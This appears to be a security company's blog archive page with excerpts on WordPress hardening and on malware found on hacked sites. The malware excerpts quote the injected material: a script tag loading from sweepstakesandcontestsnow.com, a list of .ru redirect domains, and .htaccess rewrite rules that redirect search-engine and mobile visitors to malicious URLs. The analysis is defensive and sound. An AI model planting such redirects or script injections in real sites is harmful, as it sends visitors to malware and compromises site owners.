This post was put together in collaboration with one of our Support Engineers, Bruno Borges. Be sure to take a minute and say thanks for the info; he loves Twitter (when it's up). It seems every day we’re combating malicious redirections. Often, they are simple, but every day they are evolving, and in some instances become [...]
How To: Lock Your Site by Enabling a Second Layer of Authentication
I put together a post this weekend about my personal experience installing a WordPress site on a clean server. In the process of hardening the administration panel I found myself doing something that I don’t see discussed much – enabling Basic Access Authentication. That got me thinking about putting together this post which will [...]
How To: Stop The Hacker By Hardening WordPress
Every day we service 100s of clients and the question is always asked: “How do you stop these hackers!!!” Unfortunately, it’s perhaps the hardest to explain and understand for most. That being said, this post will be one of a series that talks to what end-users can do to help reduce their threat landscape. This [...]
Ugly htaccess
No need to comment:
    ##!!##!!##!!##!!##!!####!!##!!##!!##!!##!!##
    RewriteEngine on
    RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
    [...]
New Malware – sweepstakesandcontestsnow.com
We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with malware from sweepstakesandcontestsnow.com. This is what gets added to the hacked site: <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">.. And that code is used to infect the browser of the person visiting the compromised web site. What is interesting [...]
.htaccess redirections to software-boss.ru and programmengineering.ru
Just an update to the .htaccess redirection attacks that we have been tracking for the last few days (most of them to .ru domains). Those are some of the domains being used right now: http://software-boss.ru/grammar/index.php additionalprofit.ru boss-united.ru clear-agent.ru clearagent.ru face-apple.ru fightagent.ru power-update.ru programmprofit.ru software-boss.ru syntaxswitch.ru window-switch.ru http://powerprogramm.ru/make/index.php http://jaobsofterty.ru/in.cgi?2 http://programmengineering.ru/check/index.php It is happening on [...]
Malware – htaccess redirection to sokoloperkovuske.com/in.php
Lots of people were asking us about some high profile sites that were hacked and getting redirected to http://sokoloperkovuske.com/in.php?pp=110 (including christwire.org and others). This attack was very simple and added the following code to the .htaccess file:
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
    RewriteRule .* http://sokoloperkovuske.com/in.php?pp=110 [R,L]
    </IfModule>
It basically [...]